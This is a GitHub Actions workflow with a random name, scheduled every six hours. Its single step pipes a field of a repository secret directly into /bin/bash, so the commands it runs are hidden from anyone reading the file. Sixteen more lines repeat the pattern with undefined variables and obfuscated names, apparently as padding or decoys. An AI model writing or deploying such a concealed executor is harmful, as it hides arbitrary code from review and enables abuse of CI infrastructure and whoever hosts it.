name: gaodizhanshanchensh
on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'

jobs:  # 13112
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaodizhanshanchensh
        env:
          xoyff52415: ${{ secrets.xoyff52415 }}
        run: |
          echo $xoyff52415 | jq -r .btvii28 | /bin/bash
          echo $mai88475 | jq -r .pnnkl27 | /bin/bash
          echo $z46140 | jq -r .jtked7 | /bin/bash
          echo $r72 | jq -r .r43 | /bin/bash
          echo $uhvga2619 | jq -r .pgjl2 | /bin/bash
          echo $spxn34 | jq -r .u0 | /bin/bash
          echo $gmn41 | jq -r .pbwox80033 | /bin/bash
          echo $uplq7058 | jq -r .evnsl021 | /bin/bash
          echo $brulk14 | jq -r .pqr63 | /bin/bash
          echo $axmxk4 | jq -r .ri035 | /bin/bash
          echo $wr86 | jq -r .byiig84825 | /bin/bash
          echo $wtxf1 | jq -r .c635 | /bin/bash
          echo $q1 | jq -r .huvzk107 | /bin/bash
          echo $dgx48135 | jq -r .lvx18077 | /bin/bash
          echo $p04516 | jq -r .or4528 | /bin/bash
          echo $fc8 | jq -r .elh27 | /bin/bash
          echo $ozxfq07 | jq -r .ksi29 | /bin/bash

